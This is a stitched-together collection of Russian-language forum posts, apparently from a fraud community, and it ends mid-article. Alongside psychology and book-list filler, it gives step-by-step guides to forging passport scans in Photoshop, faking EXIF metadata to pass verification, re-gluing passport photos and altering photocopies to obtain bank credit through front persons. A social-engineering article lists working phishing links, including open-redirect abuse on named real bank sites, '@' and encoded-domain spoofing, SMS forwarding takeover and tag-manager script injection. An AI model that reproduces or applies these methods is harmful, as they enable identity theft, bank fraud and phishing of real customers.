В некоторых ситуациях проигнорировать провокацию не представляется возможным. Даже если вы обладаете крепкими нервами и устойчивой психикой, вы все равно должны на нее отвечать. Дело в том, что окружающие могут счесть вас слабаком, если вы не дадите достойного ответа провокатору. К примеру, в тюрьме, нельзя не реагировать на некоторые провокации, это чревато негативными последствиями. Значит надо отвечать. Но не так, как этого хочет провокатор, как он планирует, что вы ответите, а по-другому. Нельзя реагировать предсказуемо, иначе вы проиграете.
Примените ответную провокацию, вспомнив о том, что в некоторых случаях лучшая оборона – это нападение.
Click to expand...
Провоцируйте провокатора, чтобы не вы, а он совершил первое действие. Раз уж конфликта все равно не избежать, тогда хотя бы выиграйте в этом противостоянии. Это будет плюсом для вас в глазах окружающих.
Будьте непредсказуемы, чтобы провокаторы не могли вас просчитать. Если вы будете действовать непредсказуемо, непоследовательно, нелогично для провокатора, это может, как минимум, заставить его нервничать, а как максимум, отказаться от своих враждебных намерений в ваш адрес. Провокатор желает вызывать у вас предсказуемую реакцию своей провокацией, значит надо лишить его этого козыря своей непредсказуемостью.
Страх лишает вас иммунитета перед ними. Лучше отрабатывать различные варианты своих ответных действий на те или иные провокации, чтобы подготовить себя к ним. Провокации – это один из способов манипуляции вами. Но не всегда провокация – это манипуляция. Часто это ничем не прикрытая агрессия. Вам бросают вызов, провоцируя вас. Не бойтесь его. От провокаций и связанных с ними конфликтов все равно не спрятаться, так как они повсюду. Поэтому нужно на них отвечать, не реагировать, а именно отвечать, обдуманно и спокойно.
(c) SEBLOG
Всем салют!
Нужен доступ к просмотру рабочего стола конкурента. естественно без его
ведома. находимся в разных городах.
Будьте добры, помогите знаниями.
с меня подгон)))
На обучающую конференцию были приглашены специалисты – кандидаты медицинских и психологических наук. Перед ними выступал лектор по имени Мирон Л. Фокс, имеющий ученую степень PhD (поэтому его и называют доктором). Темой лекции доктора Фокса было "Применение математической теории игр в образовании по физике". На самом деле,роль доктора Фокса играл подставной актер.
По заданию экспериментаторов, он грамотно подготовился к своей лекции: выписал из научных статей несколько научных терминов, а также целые фразы, которые потом употреблял, совершенно не сообразуясь с логикой и контекстом, проработал образ эксперта, в котором предстанет перед слушателями. Речь "доктора Фокса" была бессмысленной, но наукообразной и сопровождалась эмоциональными и невербальными маркерами авторитетности и хорошего отношения к аудитории.
Актер умело располагал слушателей к себе и не выходил из образа эксперта.
После лекции специалистов, выступивших ее слушателями, попросили оценить содержательность и полезность лекционного материала. Как читатель уже догадался, эти оценки были весьма высокими (детально со статистикой исследования можно ознакомиться в оригинальной статье, ссылка на которую приведена в разделе "Литература").
Обратите внимание, лекцию доктора Фокса оценивали не студенты, не рядовые обыватели, а ученые – кандидаты медицинских и психологических наук...
Click to expand...
Эффектом доктора Фокса объясняется успех многих спикеров, которые несут наукообразную чушь, но делают это в доброжелательной, располагающей и экспертной манере. Многие лженаучные лекции, видеоролики, статьи и книги популярны во многом благодаря эффекту доктора Фокса.
Подобно подставному актеру деятели лженауки выхватывают термины и целые фразы из научных источников, зачастую даже не понимая их смысла и искажая контекст их использования. Изобретение новых наукообразных терминов также льет воду на мельницу доктора Фокса. Лжеученые щедро приправляют такими терминами и фразами свои бессмысленные и противоречивые утверждения и преподносят их своим адептам в доброжелательной и вызывающей доверие манере.
Именно эффект доктора Фокса позволяет выдавать уши мертвого осла за высокоценные открытия, продавать воздух и различные лженаучные рецепты, вовлекать людей в тренинговые пирамиды.
Нельзя забывать и о том, что многие опасные организации, например, тоталитарно-деструктивные секты, психокульты типа дианетики используют именно массовые лекции для вовлечения в свою орбиту все новых и новых членов. И знание об эффекте доктора Фокса позволяет понять, почему такой метод вовлечения оказывается эффективным.
Подведем итог
Эффект доктора Фокса будет иметь место, а слушатели (читатели, зрители)
воспримут даже откровенную чушь как поистине откровение, если:
Как же не пасть жертвой доктора Фокса?
Взято с SEBLOG
Редактируем Exif, IPTC, XMP
Не раз сталкивался с ситуацией, когда люди чтото рисуют, затем отправляют доки в конторы и удивляются почему не прошли верификацию. Поэтому решил написать статью на тему редактировние exif,IPTC, XMP информации в графических документах. Скорее всего палят что документ был отредактирован (если все было вбито правильно). Итак приступим.
Менять информацию будем с помощью бесплатной программы Exif PIlot. скачать можноcolorpilot.ru
Устанавливаем, открываем. Видим слева древовидную структуру. Находим нужный документ. Видим справа информацию о документе в закладках. (Exif, IPTC, XMP)
Заходим с вверху в закладку Edit Exif/IPTC. Выполняем пункт Clear Exif,
Clear XMP.
Довольно таки палевно будет оставить документ с пустыми Exif данными.
Выбираем в exif pilot'e оригинальный док и экспортируем данные. В наш документ
импортируем эти данные.
Нас итересует марка сканера, пиксели, разрешение, дата. Главное чтобы все совпадало (разрешение, пиксели самого документа с информацией в пилоте). Отредактировать дату можно нажам кнопку Edit/IPTC в правом нижнем углу.
Затем во вкладке Edit Exif/IPTC копируем Exif to XMP. У нас получается готовый документ для отправки в контору.
****
Дальше смотрим видео
**
**
**
**
**
**
источник и
софт[photoshopeando.co](http://www.photoshopeando.com/2015/03/05/eliminar-
metadatos-selectivamente-con-exiftool-y-automatizarlo-desde-lightroom/)
**p.s советы **Как добавить геотеги к фотографиямну и последние это Всё для безопасности а то будет как видео ниже
**
**
© copyright
В этой статье ты научишься делать “заготовки” для отрисовки,очень часто нужна отрисовка и если хочешь сделать что то хорошо - сделай сам.Нам понадобится фотошоп и прямые руки,урок рассчитан на людей знакомых с фотошопом.Для примера я буду делать украинский паспорт,находишь либо покупаешь любой скан украинского паспорта. Желательно с хорошим разрешением,я просто нашёл в гугле.
Далее мы рассмотрим один очень действенный но почему то не популярный вариант. Он подходит под большое количество доков. Тебе нужно найти пустой лист такого же документа. Сразу скажу что для некоторых документов сложно найти пустую страничку, в зависимости от ситуации включай фантазию. Если это просто белый лист с какими то данными - достаточно найти пустой белый лист, если же это что то посложнее, например ид - придется помучатся.
Мне удалось найти такое фото:
оно нам более чем подходит.
Открываем оба изображения в фотошопе. Берешь оригинал и создаёшь дубликат
слоя, под который нужно положить фото с пустой страницей.
Далее повысь на копии фона прозрачность и переключись на пустую страницу паспорта (щёлкни по слою). Далее с помощью комбинации Ctrl+t нужно подогнать их по размеру, нажимаешь и подтягиваешь, чтоб они стали одним целым.
**Возвращаем прозрачность на 100%, потом берёшь ластик и вытираешь все ненужные надписи, не пугайся что на данном этапе всё выглядит палевно **
Теперь добавь недостающих элементов, в моём случае это точки. Тупо раскопируй их с одной. Так же подправляем задетые буквы с помощью делита и магнитного лосса.
пришло время убрать палево.
переключись на слой с пустой страницей и заходи в Изображение-коррекция-
Яркость/контрастность.
Нам нужно чтобы цвета у оригинала и у пустой страницы совпали. Тягай ползунки
пока не добьешься такого результата:
(только сейчас заметил что фон сдвинут, поправил)
теперь разберёмся с серией и номер паспорта. В этом нам поможет инструмент
штамп
С помощью него делаем нужные цифры и буквы.
Далее меняй фотографию и вписывай нужные данные. Если всё выше написанное у тебя получилось то и с этим трудностей не возникнет. Этих действий будет вполне достаточно, почти все мои сканы сделанные таким способом прокатывали.Сохраняй с качеством похуже и не забывай менять подпись.Самый кайф что сделанный нами файл можно использовать бесконечное количество раз.
© copyright
Всем привет сегодня расскажу Вам на собственном опыте сделать элементарный переклей и не платить ебейшие деньги
![](/proxy.php?image=https%3A%2F%2Fupload.wikimedia.org%2Fwikipedia%2Fcommons%2Fthumb%2F9%2F9f%2FPasport_RF.jpg%2F800px-
Pasport_RF.jpg&hash=89b062c7498cd1e7864e77d3a577ef5b)
Все что вам надо это букварь старого образца до 2007г как выше на скриншоте дальше растворителем 646 и ватными палочками снимаем остатки клеевого слоя слева и сверху фотографии (где находятся остатки печати красного цвета), также удаляем клеевой слой по печати фмс России и ниже ее.
При этом удаляются и сами печати. Залазить на информационное поле строго воспрещается, сотрете штамп россия. Размачиваем капли клея растворителем и тонким пинцетом вынимаем остатки бумаги. Удаляем остатки клеевого слоя с ламината. Даем растворителю испариться.
Вся проблема в уголке,пленку любой дурак отклеит так вот мы подошли творчески к изготовлению этого и обратились к[Jesse Pinkman](https://dublik.at/threads/notarialnoe-zaverenie-vashix- dokumentov.9514/#post-339017)это не реклама сервиса а реальный факт из моей жизни если он захочет сам подтвердит мои слова правдо заказывал ещё на другом борде но тема работает и посей день
Вот и все что Вам для этого надо ацетон и сервис который сделает уголок за пару рублей и практике на пару дней,понятно в банк с такими не пойдешь,но снять хату и.т.д дебитовки мы сегодня на такой переклей берем и не очкуем Всем добра и берегите себя и Свою семью.
© copyright
Всем привет что-та меня бомбит сегодня на ретро по части кредитов расскажу истории из своего бурного прошлого и так мы имели много оператор в банках ну банками их не назовешь оператор сидит в любом большом магазине на товаре или мебели и почти все банки у них там есть,так как мутили мы по сканам ну как найти это не буду объяснять тут материала на эту тему много,так вот первое что-бы не спалить оператора надо всегда менять прописку в скане расскажу как это сделать бесплатно вначале
![](/proxy.php?image=https%3A%2F%2Fi.postimg.cc%2FDwt9dhL9%2Ffoto-pasporta-rf- s-propiskoi-moskva-big-4.jpg&hash=9ed171b53144f2e528a897a6fa852020)
Чем отличается сканирование от копирования?
Сканирование – получение копии документа с помощью сканера в цифровом формате для ввода ее в компьютер.
![](/proxy.php?image=http%3A%2F%2Ftopmigrant.ru%2Fwp- content%2Fuploads%2F2016%2F01%2F163b8e94f0b9eec504914a90ebf8ff17.jpg&hash=a11734de73a2891de1445788976ed908)
Копирование – получение точной копии (или множества копий) документа на бумажном носителе с помощью копировального аппарата.Да многие кстати реально путают эти значения мы будем работать с ксерокопией паспорта что на втором месте в данном топе первым делом мы заказали выписку своего региона найти тут можно тыц.
Думаю тут все понятно берем ксерокопию и в ней ебашим выписку,ниже ставим прописку свою пока шли печати для прописки а регион у нас большой сука и под каждый район сделать прописку накладно мы делали просто,брали маркер белый и в печати затирали все что нужно и писали сами от руки новый адрес и делали опять ксерокопию получалось не плоха добавлю что были случаи меняли на х.. и год рождения и серию недействительную на действующую и это вкатывало реально так банки пробивали тогда только на действительность паспорт.
пример как это выглядит берем с халявы любой скан и пробиваем.
пробиваем[тыц](http://xn--b1afk4ade4e.xn--b1ab2a0a.xn--b1aew.xn--p1ai/info- service.htm?sid=2000) получаем результат
меняем одну цифру номера паспорта в ксерокопии и он живой.
Думаю тема по ксерокопиям и их продажи будет жить вечна пару нюансов на которые следует обратить внимания,всегда делайте выписку больше пол-года и смотрите даты а то мы один раз выписали терпилу выходной день,что оператор ржал про наш блат в паспортном столе.
Если у вас реальные сканы, не правленные , не отрисованные в фотошопе, то все Ок. А если скан редактировался или отрисовывался то откройте его в WinHex и увидите много интересного.
**Что делать?**
Распечатайте отрисованный скан и затем уже этот распечатанный скан вновь отсканируйте.
p /s Добавлю также мы ставили всем дропам в действующий паспорт новый адрес и прописку и все это катило думаю и сейчас катит,раньше банки не видели прописку сейчас не скажу честно не знаю.
© rewrite
**1. Джо Наварро "Я вижу о чём вы думаете" **
Джо Наварро, бывший агент ФБР и эксперт в области невербального общения, учит моментально «сканировать» собеседника, расшифровывать едва заметные сигналы в его поведении, распознавать завуалированные эмоции и сразу же подмечать малейшие подвохи и признаки лжи.
[2. Десмонд Моррис "Библия языка телодвижений" ](https://flibusta- is.appspot.com/b/380817/read)
Книга, которую по праву можно считать настоящей библией языка телодвижений. Сочетая научный подход с ясным изложением, Моррис подробнейшим образом останавливается на каждом из многочисленных типов скрытых знаков тела, которые мы ежедневно наблюдаем у других и подаем сами. После знакомства с его уникальным исследованием вы сможете без труда читать мысли и чувства окружающих, поскольку их жесты и мимика станут для вас открытой книгой.
[3. Пол Экман "Психология лжи" ](https://flibusta- is.appspot.com/b/196362/read)
Правда ли, что современный человек в среднем лжет трижды за десять минут разговора? Как реагировать на то, что ложь проникла во все сферы человеческой жизни? Что делать, если не удается распознать ложь по словам и голосу? В книге Пола Экмана вы найдете исчерпывающие ответы на эти вопросы. Помните, что скрыть обман чрезвычайно сложно. Универсальные микровыражения и микрожесты всегда выдают лжеца, независимо от социального статуса и национальной принадлежности.
Научитесь замечать то, чего не видят другие.
4. Пол Экман "Узнай лжеца по выражению лица"
Вы заметите, если кто-то притворяется удивленным? А если кто-то испуган, но хочет выглядеть рассерженным, вам под силу это разглядеть? Насыщенная огромным количеством тщательно отобранных фотографий и специальных упражнений, эта книга позволит вам безошибочно распознавать ложь, моментально читая по лицам эмоции: как подлинные, так и «наигранные». Радость, удивление, страх, гнев, печаль, отвращение — ничто не ускользнет от вашего внимательного взгляда. Совершенствуйте свои навыки, чтобы защититься от обмана на работе и дома.
5. Фрай Олдерт "Ложь. Три способа выявления. Как читать мысли лжеца, как обмануть детектор лжи"
**6. Фрай Олдерт "Детекция лжи и обмана" **
Почему люди лгут? Как распознать ложь и обман в поведении и речи человека? Эти фундаментальные вопросы находят свое решение на страницах предлагаемого руководства. В книге представлены исследования психологических и физиологических показателей правдивого и лживого поведения и речи, а также — фактология использования метода детекции лжи и обмана с помощью полиграфа («детектора лжи»). Эта книга принесет пользу всем, кто должен знать, говорят ли окружающие правду, и иметь практическое руководство, чтобы обеспечить себе это знание — для социальных и юридических психологов, криминалистов, политических консультантов и адвокатов.
7. Джеймс Борг "Язык тела"
Семь простых уроков от Джеймса Борга позволят вам стать экспертом в чтении чужих мыслей и чувств и научат контролировать собственные жесты, чтобы добиваться от людей желаемой реакции.
[8. Аллан Пиз "Новый язык телодвижений" ](https://flibusta- is.appspot.com/b/393030/read)
Самая популярная книга по языку тела от Аллана Пиза, но при её прочтении будьте внимательные, в ней не всё так красиво как может показаться. Вообще мы даже не очень хотели добавлять её в этот список, но в расширенной версии можно найти пользу для себя, изучая язык жестов.
9. Майк Каро "Язык Жестов. Покерные жесты"
Самая заметная работа об игре в живой покер, языке тела и жестов. Книга описывает все виды покера (5-карточный, 7-карточный, холдем), и очень полезна, если вы много играете в игры с настоящими людьми в казино или дома. Книга хорошо составлена, в ней содержатся полезные описания обсуждений, фотографий и стратегий для каждого возможного жеста.
1[0. Джордж Джозеф Крезге "Менталист"](https://flibusta- is.appspot.com/b/429757/read)
Эту книгу написал Джордж Крескин — признанный менталист №1 нашего времени. Вот уже более 60 лет он исследует возможности человеческого разума и разрабатывает техники и приемы, которые позволят каждому из нас развить свой ментальный потенциал. Как достичь максимальной концентрации сознания? Как быстро и легко осуществить внушение? Как «прочитать», что у человека в голове, и внедрить свою мысль в чужое сознание? Как эффективно читать невербальные коммуникации людей? Как знать ответ на вопрос прежде, чем задашь его? Как прогнозировать будущее точнее, чем профессиональные гадалки и астрологи? Как по максимуму развить органы чувств и достичь экстрасенсорного восприятия?
Несколько приемов воздействия словом
Для примера возьмем четыре варианта словесной агрессии и посмотрим, как можно с ними справиться:
1. Расширение рамки
В узкой рамке часто тесно. И результат предопределен. Поэтому, когда Вам
задают некоторые рамки, нужно из этих рамок выходить.
2. Модель мира
Сколько людей, столько и мнений. И есть мнения весьма авторитетные. Всегда
можно найти авторитета, чья субъективная реальность благоприятна для Вас.
3. Детализация
Можно сузить рамку восприятия, и тогда в фокус попадет совсем не то, на чем
заострил внимание оппонент.
4. Уточнение
Вы не спорите – вы уточняете. Вы искренне пытаетесь понять, а для этого
спрашиваете о многочисленных деталях.
5. Зеркало
А если вам поменяться местами, утверждение сохранит силу? Редко. Обычно люди
дают себе больше прав. Но ловятся на ценность справедливости.
6. Измеримость
Хороший способ сбить пафос – попробовать применить к ценности какую-нибудь
шкалу или измеримый критерий. Готовьте линейку!
7. Последствия
Полезно указать на последствия подобных фраз и мыслей. Они, часто, такие
захватывающие, что обсуждать вы будете уже их.
8. Намерение
Люди закладывают в свои действия смысл. Или не закладывают. В любом случае
всегда можно указать на благие намерения. Или на подлые. В зависимости от
вашей цели.
9. О важном
Люди любят говорить о важном. И еще любят сравнивать важность. Вот этим пусть
и займутся, а мы для этого будем ссылаться на высшие ценности.
10. Контрпример
Логика гласит: один контрпример доказывает ложность обобщения. Ищите
исключение, и будет вам счастье!
11. Рекурсия
Что будет, если применить упрек к самому агрессову? Нечего на зеркало пенять,
коль рожа крива.
12. Перевод стрелок
Наглость чистой воды. Мы заявляем: это обсуждать мы не будем – мы будем
обсуждать другое. Доказывает это лишь наш тон. Но его обычно бывает
достаточно.
13. Переопределение
Назови трусость осторожностью, жадность бережливостью, а истеричность
искренностью. Или напротив смелость глупостью, щедрость расточительством, а
спокойствие равнодушием.
14. Дополнение
Сразу утверждать противоположное не всегда удобно. Но можно так согласиться,
что смысл перевернется. Как? Внося свои дополнения и уточнения.
15. Аналогия
Все аналогии лживы. Зато эффективны. Мы не будем обсуждать предложенный вопрос
– мы нарисуем картинку, исходя из которой нужный нам выход очевиден. И
собеседник, согласившись с аналогией, сам сделает нужный вывод.
Приведенные трюки не единичны. На каждый тип раскрутки можно придумать неограниченно много фраз-ответов.
Есть одно замечание, без которого этот урок был бы неполным. Вы можете использовать перечисленные техники как для простого развлечения, внося в занудные разговоры нотку разнообразия, так и для того, чтобы расшатать ценности и убеждения своего собеседника. Во втором случае вы открываете мозг человека для изменений, и можете наполнить его собственными программами.
Поэтому используйте эти знания с осторожностью.
Для тренировки в словесной эквилибристике вам не нужен тренер и группа. Первоначально достаточно просто посидеть и пописать раскрутки на бумаге. А потом тренировать в жизни. По одной в день.
А напоследок я хочу дать вам ссылку на веселый видеоролик о том, как следует общаться с настойчивыми просителями (пригодится для чиновников и руководителей всех рангов).
Специалист компании ESET Лукаш Стефанко (Lukas Stefanko), который часто обнаруживает малварь в официальном каталоге приложений для Android, на этот раз [рассказал](https://www.welivesecurity.com/2018/12/03/scam-ios-apps- promise-fitness-steal-money-instead/) о двух вредоносных приложениях в App Store.
Мошеннические приложения назывались Fitness Balance и Calories Tracker, и оба демонстрировали похожее поведение, которое можно увидеть в роликах, опубликованных пострадавшими пользователями на Reddit (1, 2), а также в примере опубликованном самим Стефанко.
После установки, при первом же запуске, приложения просили своих жертв приложить палец к сканеру TouchID якобы для завершения настройки. На самом деле, как только пользователь предоставлял приложению свой отпечаток, он тем самым подтверждал платеж через TouchID в размере 99, 99, 119,99 или 139.99 долларов США. Если пользователь отказывался, приложение попросту не запускалось.
Разумеется, для осуществления платежа к App Store должна была быть привязана платежная карта, и у пользователя должно было хватать средств. Кроме того, в безопасности были владельцы iPhone X, у которых есть защитная функция Double Click to Pay.
При этом исследователь пишет, что оба приложения явно были сделаны на скорую руку. Так, после подтверждения платежа они попросту закрывались и пропадали с экрана, даже не пытаясь маскироваться и имитировать работу. Но оба вредоносных решения имели хороший рейтинг. К примеру, Стефанко отметил, что рейтинг Fitness Balance равен 4,3 и у приложения множество отзывов с 5 звездами. Эксперт объясняет, что большинство отзывов попросту были фальшивыми. Пример можно увидеть ниже.
Пострадавшие пользователи рассказывают на [Reddit](https://www.reddit.com/r/assholedesign/comments/a1h3xf/this_app_tricks_you_into_asking_for_the/?utm_source=reddit- android), что попытки связаться с разработчиком приложений ни к чему не привели. В ответ на все жалобы приходил лишь автоматический ответ, гласящий, что автору известно об описанной «ошибке», и она будет исправлена с выходом новой версии.
В настоящее время оба приложения уже удалены из App Store, а пострадавшим пользователям рекомендуется связаться с поддержкой Apple и потребовать возврата списанных средств.
Статья взята с Хакера.
Нестандартные техники введения в заблуждение
Считается, что таргетированные атаки отнимают больше времени на подготовку. Из
опыта я знаю, что спровоцировать сделать что-то сотню случайных человек легче,
чем одного конкретного в определенной организации.
Давний парадокс остается актуальным: ИТ-специалисты не устают заявлять, что
социальная инженерия — главное зло. При этом многие «безопасники»
продолжают считать, что хитроумного софта и однажды написанных инструкций для
персонала достаточно, чтобы противостоять киберугрозам.
Доверенный сайт как проходной двор
У вашего файрвола формально настроены «черные» и «белые» списки URL? Тогда мы
идем к вам! Вот несколько примеров, когда на сайте банка используется одна
известная CMS с незакрытым редиректом:
Code:Copy to clipboard
https://club.alfabank.ru/bitrix/redirect.php?goto=http://zloyalfabankclub.ru
https://avbbank.ru/bitrix/redirect.php?goto=http://plohoyavbbank.ru
http://www.rncb.ru/bitrix/redirect.php?goto=http://zloyrncb.ru
http://www.moscow-bank.ru/bitrix/redirect.php?goto=http://ne-moscow-bank.ru
http://kbivanovo.ru/bitrix/redirect.php?goto=http://hackkbivanovo.ru
Если файрвол смотрит только то, что идет после первого http(s), то пора его подкрутить. Но эта статья не про настройку межсетевого экрана, а про человеческие слабости. Поэтому просто дай сотруднику такую ссылку и проверь, насколько он бдителен и смотрит ли он дальше первого встречающегося http(s).
Что за собака?
Данный способ не сработает с внимательными сотрудниками, но если бы все были
внимательны, то социальной инженерии не существовало бы как явления.
Развивая предыдущий способ для тех, кто привык смотреть, что идет сразу после
http://, и думать, что URL безопасен: данная ссылка
Code:Copy to clipboard
https://bank.ru@zloysite.ru
тоже не приведет ни к чему хорошему.
Почему так происходит? Допустимые в URL символы задокументированы в
стандарте RFC 1738. Символ @ используется в URL как специальный разделитель,
когда нужно прямо в нем дать права для доступа к странице. В конструкции вида
httр://<логин>:<пароль>@<хост> до @ можно указывать практически что угодно.
Браузер все равно отправит пользователя на хост, указанный после @.
Что за абракадабра?
Добавим в зловредный URL немного кириллицы, закодированной в UTF-8 → HEX,
чтобы он выглядел непонятно для человека и на первый взгляд безопасно:
Code:Copy to clipboard
http://bank.ru@%D0%B7%D0%BB%D0%BE%D0%B9%D1%81%D0%B0%D0%B9%D1%82.%D1%80%D1%84
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fhex.png&hash=c35736153e1b5fd1bf261da6a97bb6d6)
Закодированный домен .рф в URL
Или совместим простые техники (редирект + кодирование):
Code:Copy to clipboard
http://www.moscow-bank.ru/bitrix/redirect.php?goto=http://www.moscow-bank.ru@%D0%B7%D0%BB%D0%BE%D0%B9%D1%81%D0%B0%D0%B9%D1%82.%D1%80%D1%84
При наведении мыши на закодированный URL десктопные браузеры декодируют символы (чего не скажешь об Outlook и мобильных браузерах). Поэтому для полного скрытия злого адреса можно прописать адрес сервера, на котором расположен фишинговый сайт:
Code:Copy to clipboard
http://www.moscow-bank.ru/bitrix/redirect.php?goto=http://www.moscow-bank.ru@178.248.232.27
или просто
Code:Copy to clipboard
http://www.moscow-bank.ru@178.248.232.27
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fipservera.png&hash=1330ebe11fe6dabbe12d99e5db4de7d4)
Вместо домена в URL используем IP сервера
Не забудь прикрутить к серверу HTTPS , чтобы браузер не ругался, но об
этом позже.
Переполнение предпросмотра
Наверняка ты уже знаешь, что настоящее расширение файлов можно спрятать,
используя ограничение отображаемой длины столбца extension в «Проводнике» или
архиваторе (или помнишь со времен ICO. ).
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Frararhiv.png&hash=920190348c85dcc988cfd446e727e793)
Попытка скрыть расширение файла в архиве
Теперь давай попробуем сходным образом скрыть злую часть URL на этапе
предпросмотра в браузере.
Если сотрудник знает, что анкор ссылки может быть не равен целевому URL, то он
наведет мышкой на ссылку и посмотрит, куда на самом деле она ведет. Если
это его единственный способ проверки ссылок, то инструкции по безопасности в
такой компании пора обновлять.
Злая ссылка может быть, к примеру, такой:
Code:Copy to clipboard
https://berbank.ru:ааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа@zloysait.ru/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb.html
Вместо aaaa и bbbb пишем разные ключевые слова, которые обычно используются на
оригинальном сайте.
При наведении мышкой в Firefox увидим сокращенный посередине адрес сайта, из-
за чего часть zloysait.ru не отображается.
Видна только не вызывающая подозрений часть ссылки:
Code:Copy to clipboard
https://berbank.ru:аааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааааа...bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb.html
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fperepoln.png&hash=3882a3ba678dc922f45f3b9cb25dbeca)
Сокращенный URL в Firefox
Для больших экранов фишинговую ссылку лучше сделать подлиннее.
Click to expand...
Если навести мышку на такую ссылку в Internet Explorer или Edge, то мы не
увидим вообще ничего. Судя по всему, их смущает повторное двоеточие в адресе,
что нас вполне устраивает.
Chromium-браузеры от Google и Яндекса отображают конечный URL
zloysait.ru/bbbbbbbb...bbbbbbbb.html, поэтому данный способ подойдет для
таргетированной атаки, когда известен браузер жертвы.
«Почта России» тебе в помощь!
Если жертва занимает руководящую должность в целевой компании, можно
попробовать сыграть на ее чувстве собственной важности.
Создается фейковый одностраничник конференции (бизнес-мероприятия, бизнес-
форума и подобного).
Теперь жертву нужно заманить на ресурс. Почему бы не отправить бумажное
письмо ей на работу? Тут ты точно обойдешь всю цифровую и железную защиту в
организации и даже нейросетевой файрвол в виде секретарши, так как, по ее
мнению, если она выкинет такое письмо в корзину, ее начальник не обрадуется.
Очень уж привлекательно выглядит содержимое — красивое приглашение
поучаствовать в пафосном мероприятии в качестве спикера (члена жюри, лауреата
престижной премии).
Дальше все стандартно: предлагается скачать и заполнить «анкету»
участника. Можно даже QR-код напечатать (вроде как заботимся о вашем удобстве,
глубокоуважаемая жертва).
Личное или публичное?
Следующие несколько способов относятся к атакам на организацию через
использование фактов о личной жизни сотрудника. Рассказывая о защите от
социальной инженерии, я настаиваю на том, что человек должен знать правила
безопасности не ради организации, а в первую очередьдля себя.
Пока в некоторых СБ думают, что принесенный на работу смартфон с пойманным на
выходных трояном нельзя использовать для прослушки внутриофисных событий, мы
будем находить таких сотрудников и делать их более компетентными.
Не чекином единым
Если ты тестируешь личный email сотрудника или его аккаунт в соцсетях, то
посмотри, где человек отдыхал в последнее время.
Видишь название отеля? Смело пиши от имени администрации отеля и требуй
доплаты за сервис. В письмо добавь надпись, что данное сообщение сгенерировано
автоматически, а для ответа нужно воспользоваться формой на официальном сайте
в разделе поддержки клиентов.
Дав фейковую ссылку, предложи ему зарегистрироваться. Кто знает, быть может, этот логин/email и пароль он использует и на других ресурсах.
Click to expand...
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fotel.jpg&hash=b178f11f706d43ffefe1335c18ccfe7f)
Хотел похвастаться и навлек неприятности
Потенциальная жертва летает самолетами «Аэрофлота»? Напиши, что срочно
надо активировать бонусные мили, и тогда их количество удвоится! Сделать это
нужно по твоей фейковой ссылке с лендингом акции.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Faeroflot.jpg&hash=f095a576bf5f44447ac392b687d79d48)
Авиабилет — находка для социнженера
Жертва недавно посетила какое-то мероприятие? Попроси ее
зарегистрироваться по твоей ссылке, чтобы получить все записи с конференции +
бонусный контент и скидку на участие в следующей!
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fconf.jpg&hash=299239fd047390e5e201b7d6b4a747ab)
Пост в соцсети, облегчающий жизнь пентестеру
Чтобы жертва ничего не заподозрила, после того как зарегистрировалась, ей
можно показать сообщение об ошибке (например, «404. Ой, что-то пошло не
так, попробуйте повторить ваш запрос позже!») или отправить на главную
страницу сайта.
Примерно в таком ключе можно обращаться к человеку на основании свежих данных
из его аккаунтов в соцсетях. Здесь мы использовали по большей части фишинговые
методы, и нам этого достаточно, чтобы проверить бдительность сотрудника.
Настоящие злодеи, конечно, на этом не остановятся и будут использовать
уязвимости браузеров и вредоносные файлы для заражения устройства жертвы. Это
уже техническая часть, а не социальная.
SMS-редирект
Наверняка ты уже слышал историю о том, что у Bitcoin-инвестора с подходящей
фамилией Терпин украли 23 миллиона долларов при помощи банального запроса о
переносе номера мобильного на новую SIM-карту. А что, если немного
пофантазировать и посмотреть, как с помощью фишинга получить доступ к
интернет-сервисам сотрудника, защищенным двухфакторной аутентификацией? Вдруг
кто-то из сотовых операторов дает возможность получить симку, не воруя номер?
Сотруднику на личный телефон (или корпоративный мобильный) отправляется SMS
или email с призывом сделать что-то в его личном кабинете. Повод лучше выбрать
страшный (из-за чего прямо сейчас нужно туда зайти) или надавить на жадность,
чтобы не побуждать человека звонить в техподдержку. Нужно только знать, к
какому оператору относится его номер, и дать подходящую фишинговую ссылку.
После получения доступа в кабинет человек со злым умыслом ставит свой телефон для приема SMS в разделе «Переадресация сообщений».
Click to expand...
У большинства операторов предоставляется на выбор множество сценариев по
настройке редиректов.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Fsms-
redirect.png&hash=f759735607cd7017d9b07b1ba06cb653)
Описание услуги на сайте сотового оператора
Один email — один банк
Если ты нашел на сайте какого-то крупного банка такую строчку:
Code:Copy to clipboard
src='//www.googletagmanager.com/gtm.js?id='
то представь следующий сценарий:
INFO
Google Tag Manager — сервис, который упрощает размещение на сайте
информации, в том числе JS-скриптов. Соответственно, если ты имеешь доступ к
аккаунту, с которого делаются настройки Tag Manager, ты можешь внедрить свой
вредоносный код на сайт.
![](/proxy.php?image=https%3A%2F%2Fxakep.ru%2Fwp-
content%2Fuploads%2F2018%2F10%2F189769%2Ftagman.png&hash=6a8a2ad809bae0ef924c98c0b138c6a8)
Место для вставки вредоносного кода
Маркетологам на заметку
Кстати, вот один из способов сфишить email маркетолога, отвечающего за сайт.
Если организация дает рекламу в AdWords, то возможен такой сценарий. Здесь:
https://ads.google.com/aw/preferences — пишем название фейкового аккаунта.
Что-то наподобие:
Code:Copy to clipboard
